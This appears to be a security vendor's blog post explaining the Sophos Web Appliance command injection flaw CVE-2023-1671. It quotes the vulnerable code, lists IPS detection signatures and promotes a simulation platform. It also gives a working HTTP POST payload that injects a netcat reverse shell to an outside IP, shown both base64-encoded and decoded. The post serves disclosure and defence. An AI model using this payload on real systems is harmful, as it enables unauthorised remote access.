Free Trial
|
Login
Free Trial
Login
Platform

Platform

I want to

report
WHITEPAPER Picus Red Report 2024
white paper
DATASHEET Security Validation Platform
Use Cases

Use Cases

Frameworks

Group
WHITEPAPER Building a Robust Defense-in-Depth Strategy with Breach and Attack Simulation (BAS)
webinar
ON-DEMAND Top Ten ATT&CK Techniques: The Rise of ‘Hunter-Killer’ Malware
Research

RESEARCH

LEARNING

report (1)
REPORT 2024 Gartner® Peer Insights™ Voice of the Customer for Breach and Attack Simulation (BAS) Tools
report (1)
REPORT Blue Report: Effective Threat Exposure Management
Resources

RESOURCES

LEARNING

Group
WHITEPAPER Double Your Threat Blocking in 90 Days
webinar
UPCOMING WEBINAR Maximizing Cybersecurity with GenAI
Company

COMPANY

PARTNERS

webinar
UPCOMING WEBINAR Maximizing Cybersecurity with GenAI
Data sheet
DATASHEET The Pioneer of Breach & Attack Simulation
GET A DEMO

CVE-2023-1671: Sophos Command Injection Vulnerability Exploited in the Wild

Huseyin Can YUCEEL | November 22, 2023

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On November 16, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) added Sophos Web Appliance CVE-2023-1671 Command Injection vulnerability into the Known Exploited Vulnerabilities (KEV) catalog [1]. Although it was disclosed in April 2023, CVE-2023-1671 is actively being exploited in the wild. CVE-2023-1671 vulnerability has a CVSS score of a CVSS score of 9.8 (Critical).

In this blog, we explained the Sophos CVE-2023-1671 vulnerability and how organizations can defend against the CVE-2023-1671 exploitation attacks.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Sophos Web Appliance CVE-2023-1671 Explained

Sophos Web Appliance (SWA) is used by organizations to filter incoming web traffic to protect against web-based threats. It is often used for content filtering, threat protection, and data loss prevention (DLP). Sophos Web Appliance is placed at the network perimeter or specified network segments where web traffic can be analyzed and filtered.

In April 2023, Sophos disclosed a pre-auth command injection vulnerability affecting Sophos Web Appliance. This vulnerability allows adversaries to execute arbitrary commands and does not require authentication. CVE-2023-1671 affects Sophos Web Appliance prior to version 4.3.10.4. SWA receives updates automatically by default, and Sophos released a fix at the time of disclosure. Although SWA has an auto-update feature and the product became End-of-Life on July 20, 2023, adversaries are still exploiting vulnerable SWA in the wild. Organizations are advised to fix their vulnerable SWA and keep the device behind a firewall, making it inaccessible via the public internet.

How Sophos Web Appliance CVE-2023-1671 Exploit Works?

Sophos CVE-2023-1671 vulnerability stems from a vulnerable component named warn-proceed handler. The weakness is classified as CWE-77 and allows adversaries to manipulate input for pre-authenticated command injection. User inputs sent through "/index.php?c=blocked" using an HTTP POST request are routed to UsrBlocked.php and processed by escapeshellarg function [2].

if($_GET['action'] == 'continue') {
 if(strlen(trim($_POST['user'])) > 0)
 $user = base64_decode($_POST['user_encoded']);
 else
 $user = $_POST['client-ip'];
 if($user == '-') $user = $_POST['client-ip'];
 $user = escapeshellarg($user);
 if($_POST['args_reason'] == 'filetypewarn') {
 $key = $_POST['url'];
 $packer = '/opt/ws/bin/ftsblistpack';
 $value = $_POST['filetype'];
 }
 else {
 $key = $_POST['domain'];
 $packer = '/opt/ws/bin/sblistpack';
 $catParts = explode("|",$_POST['raw_category_id']);
 $value = $catParts[0];
 }
$key = escapeshellarg($key);
 $value = escapeshellarg($value);
 $this->log->write("DEBUG","cmd = '$packer $key $user $value'");
 $result = shell_exec("$packer $key $user $value 2>&1");

Code section where UsrBlocked.php handles user inputs

When an attacker sends a base-64 encoded command via a POST request, it is injected into ftsblistpack. Since the input is wrapped in single quotes, attackers can manipulate the input and execute commands remotely.

open my $flag, ">", "$flag_file_dir/$proceeded_flag_file" or die "Open file [$flag_file_dir/$proceeded_flag_file] failed" and $rc++;
 close($flag);
$rc += system("$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'");
 }
 exit $rc;

The system function in the ftsblistpack Perl script before the patch

An example payload is given below. It executes a reverse shell connection to the test machine.

— Base-64 encoded

POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguMS40MiA0NDQ0ICM=

— Base-64 decoded


POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=';nc -e /bin/sh 192.168.1.42 4444 #

How Picus Helps Simulate Sophos CVE-2023-1671 Attacks?

We also strongly suggest simulating the Sophos CVE-2023-1671 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, Looney Tunables, and ProxyShell, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Sophos CVE-2023-1671 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

34756

Sophos Web Appliance Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Sophos CVE-2023-1671 vulnerability and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Sophos CVE-2023-1671 vulnerability:

Security Control

Signature ID

Signature Name

Checkpoint NGFW

asm_dynamic_prop_CVE_2023_1671

Sophos Web Appliance Command Injection (CVE-2023-1671)

Cisco FirePower

1.61794.1

SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt

Fortigate IPS

52919

web_app3: Sophos.Web.Appliance.warn-proceed.Command.Injection

Imperva SecureSphere

  

CVE-2023-1671: Sophos Web Appliance Pre-Auth RCE

McAfee

0x452e5000

HTTP: Sophos Web-Appliance Pre-Authentication Command Injection Vulnerability (CVE-2023-1671)

Palo Alto

93746

Sophos Web Appliance Command Injection Vulnerability

Snort

1.61794.1

SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof the Picus Complete Security Validation Platform.

References

[1] "CISA Adds Three Known Exploited Vulnerabilities to Catalog," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog. [Accessed: Nov. 22, 2023]

[2] "Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog," VulnCheck. Available: https://vulncheck.com/blog/cve-2023-1671-analysis. [Accessed: Nov. 22, 2023]